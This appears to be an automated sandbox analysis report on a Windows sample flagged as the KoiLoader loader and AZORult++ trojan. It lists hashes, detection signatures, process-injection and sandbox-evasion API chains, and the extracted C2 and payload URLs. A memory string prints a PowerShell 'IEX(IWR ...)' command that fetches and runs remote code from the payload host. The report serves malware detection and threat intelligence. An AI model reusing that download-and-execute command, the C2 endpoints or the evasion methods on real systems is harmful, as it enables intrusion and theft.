Windows Analysis Report
tcmeimnnMZ.exe

Overview

General Information

Sample name:	tcmeimnnMZ.exe renamed because original name is a hash value
Original sample name:	b3e62e0daf3abe85e035558fed736e91.exe
Analysis ID:	1528831
MD5:	b3e62e0daf3abe85e035558fed736e91
SHA1:	bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
SHA256:	b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
Tags:	exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: tcmeimnnMZ.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}

Multi AV Scanner detection for submitted file

Source: tcmeimnnMZ.exe	ReversingLabs: Detection: 71%
Source: tcmeimnnMZ.exe	Virustotal: Detection: 77%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: tcmeimnnMZ.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48FC0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_00E48FC0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48380 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_00E48380
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E48356 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_00E48356

Uses 32bit PE files

Source: tcmeimnnMZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tcmeimnnMZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E48660 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_00E48660

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://121.127.33.20/fermentum.php

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E466E0 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00E466E0

Source: tcmeimnnMZ.exe	String found in binary or memory: http://121.127.33.20/fermentum.php
Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://121.127.33.20/fermentum.php%temp%
Source: tcmeimnnMZ.exe	String found in binary or memory: https://kionaonline.com/modules/bonslick
Source: tcmeimnnMZ.exe, 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kionaonline.com/modules/bonslick/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E48E60 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_00E48E60

Contains functionality to call native functions

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45EB0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_00E45EB0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_00E45B30

Detected potential crypto function

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062E87D	0_2_0062E87D
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E424E0	0_2_00E424E0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E478A0	0_2_00E478A0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E47480	0_2_00E47480
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E442A0	0_2_00E442A0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E446A0	0_2_00E446A0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: String function: 00623040 appears 46 times
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: String function: 00624480 appears 33 times

Uses 32bit PE files

Source: tcmeimnnMZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E46250 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_00E46250

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E46C00 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,

0_2_00E46C00

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Command line argument: jhl46745fghb

0_2_00622F40

Source: tcmeimnnMZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tcmeimnnMZ.exe	ReversingLabs: Detection: 71%
Source: tcmeimnnMZ.exe	Virustotal: Detection: 77%

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Section loaded: sspicli.dll	Jump to behavior

Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tcmeimnnMZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: tcmeimnnMZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: tcmeimnnMZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tcmeimnnMZ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected KoiLoader

Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.ee17f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcmeimnnMZ.exe.ee17f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tcmeimnnMZ.exe PID: 7432, type: MEMORYSTR

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00621300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_00E48660

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_00E48660

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

API coverage: 9.9 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

0_2_00E48660

Source: tcmeimnnMZ.exe	Binary or memory string: Hyper-V
Source: tcmeimnnMZ.exe, 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: tcmeimnnMZ.exe	Binary or memory string: VMWare
Source: tcmeimnnMZ.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: tcmeimnnMZ.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0062695B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00621300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00621300

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00621710 mov ecx, dword ptr fs:[00000030h]	0_2_00621710
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_006275A2 mov eax, dword ptr fs:[00000030h]	0_2_006275A2
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00629763 mov eax, dword ptr fs:[00000030h]	0_2_00629763
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E45EB0 mov eax, dword ptr fs:[00000030h]	0_2_00E45EB0
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00E47690 mov eax, dword ptr fs:[00000030h]	0_2_00E47690

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_0062A845 GetProcessHeap,

0_2_0062A845

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_00623D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00623D4E
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062695B
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_0062421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062421C
Source: C:\Users\user\Desktop\tcmeimnnMZ.exe	Code function: 0_2_006243AF SetUnhandledExceptionFilter,	0_2_006243AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00E45B30 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_00E45B30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_006244C5 cpuid

0_2_006244C5

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

Code function: 0_2_00624103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00624103

Source: C:\Users\user\Desktop\tcmeimnnMZ.exe

0_2_00E48660

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://121.127.33.20/fermentum.php	true	1%, Virustotal, Browse	unknown

ID:	1528831
Product:	CloudBasic
Start time:	10:31:25
Start date:	08.10.2024
Sample:	tcmeimnnMZ.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b3e62e0daf3abe85e035558fed736e91
SHA1:	bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
SHA256:	b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
tcmeimnnMZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted URLs

Windows Analysis Report tcmeimnnMZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted URLs

Windows Analysis Report
tcmeimnnMZ.exe

Malware Threat Intel
Provided by